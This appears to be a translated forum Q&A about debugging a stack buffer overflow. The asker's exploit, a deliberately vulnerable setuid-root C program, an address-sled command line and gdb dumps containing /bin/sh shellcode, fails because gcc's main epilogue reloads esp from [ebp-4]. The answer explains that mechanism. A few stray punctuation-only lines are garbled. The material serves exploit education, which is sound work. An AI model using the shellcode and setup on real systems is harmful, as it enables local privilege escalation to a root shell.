Executing shellcode stored in an environment variable using buffer overflow

I use the code below to try to execute some shellcode stored in an environment variable, by overflowing the searchstring buffer so that main's return address is replaced with the address of the environment variable. However, I get a segmentation fault before the printf output appears.

#include <stdio.h>
#include <string.h>

/*
 * Deliberately vulnerable test program used to demonstrate a stack buffer
 * overflow. Note: `void main` is a non-standard signature; `int main` is the
 * conforming form, and it can influence the epilogue gcc emits for main
 * (the disassembly shown below this listing ends with
 * `mov ecx,[ebp-0x4]; leave; lea esp,[ecx-0x4]; ret`, i.e. main restores
 * esp from a saved copy at [ebp-4] rather than returning directly).
 *
 * argc/argv: standard command-line arguments; argv[1] is the attacker-
 * controlled input.
 */
void main(int argc, char *argv[]){

    char searchstring[100];             /* 100-byte stack buffer: the overflow target */

    if(argc > 1)
        /*
         * Unbounded copy of untrusted argv[1] into a 100-byte buffer: this is
         * the bug the demonstration relies on. Anything beyond 100 bytes
         * overwrites whatever lies above the buffer in main's frame (here the
         * saved-esp slot at [ebp-4], per the answer's disassembly). A bounded
         * copy (strncpy/snprintf) or leaving the stack protector enabled
         * would prevent it.
         */
        strcpy(searchstring, argv[1]);
    else // otherwise
        searchstring[0] = 0;            /* no argument: empty string */

    /*
     * No trailing newline: on a terminal stdout is line-buffered, so "Here"
     * may still be sitting in the stdio buffer when the process is killed by
     * SIGSEGV on return from main, which makes it look as if printf never ran.
     */
    printf("Here");

}

I will compile the code using

gcc -m32 -g -o overflow.o overflow.c -fno-stack-protector -z execstack

to disable the stack protector and make the stack executable. I also disabled ASLR by writing 0 to /proc/sys/kernel/randomize_va_space, and changed the owner and group to root and set the set-user-ID bit:

sudo chown root:root overflow.o
sudo chmod u+s overflow.o

The environment variable contains a NOP sled in front of the shellcode, and I determined that the address 0xffffd910 is in the middle of the NOP sled. So I run the program using

./overflow.o $(perl -e 'print "\x10\xd9\xff\xff"x40')

but I get a segmentation fault.

Running it under gdb with a breakpoint in main, the segfault occurs and the printf output never shows up; gdb reports the following:

(gdb) x/32x $esp
0xffffd910:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd920:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd930:     0x90909090      0x90909090      0xdb31c031      0xb099c931
0xffffd940:     0x6a80cda4      0x6851580b      0x68732f2f      0x69622f68
0xffffd950:     0x51e3896e      0x8953e289      0x0080cde1      0x4d524554
0xffffd960:     0x6574783d      0x53006d72      0x4c4c4548      0x69622f3d
0xffffd970:     0x61622f6e      0x58006873      0x4d5f4d44      0x47414e41
0xffffd980:     0x6d3d4445      0x6f687465      0x6c633d64      0x69737361

(gdb) x/x $eip  
0x90909090:     Cannot access memory at address 0x90909090

Inside main's frame (at 0xffffd460), searchstring has been filled with 0xffffd910:

(gdb) x/32x 0xffffd460
0xffffd460:     0xffffd49f      0xffffd49e      0xffffd590      0xffffd910
0xffffd470:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd480:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd490:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd4a0:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd4b0:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd4c0:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd4d0:     0xffffd910      0xffffd910      0xffffd910      0xffffd910

So why, after main returns, does eip end up as 0x90909090 instead of 0xffffd910, and why does esp point at 0xffffd910? What am I missing?

, , , .

!


Look at the epilogue of main; instruction 3 is the key one:

0x08048485 <+59>:    mov    ecx,DWORD PTR [ebp-0x4]
0x08048488 <+62>:    leave  
0x08048489 <+63>:    lea    esp,[ecx-0x4]
0x0804848c <+66>:    ret

searchstring overflows into the slot at ebp-0x4, which is overwritten with the NOP-sled address (0xffffd910). Instruction 1 then loads that 0xffffd910 into ecx.

Instruction 3 then sets esp = ecx - 0x4 = 0xffffd910 - 0x4 = 0xffffd90c. The dword at that address is 0x90909090 (part of the NOP sled), so when main() returns, eip = 0x90909090, and after popping that value esp = 0xffffd90c + 0x4 = 0xffffd910.

That is what happens with main() compiled this way; I reproduced the same epilogue with gcc-multilib 4.9.2-1 on Arch Linux.


Is that really what happens to esp? Isn't the return address itself overwritten with "\x10\xd9\xff\xff"?

The segfault happens at the RET: it pops the dword at %esp into %eip, and that dword is 0x90909090, which is not a mapped address, so execution faults immediately.


Source: https://habr.com/ru/post/1615799/

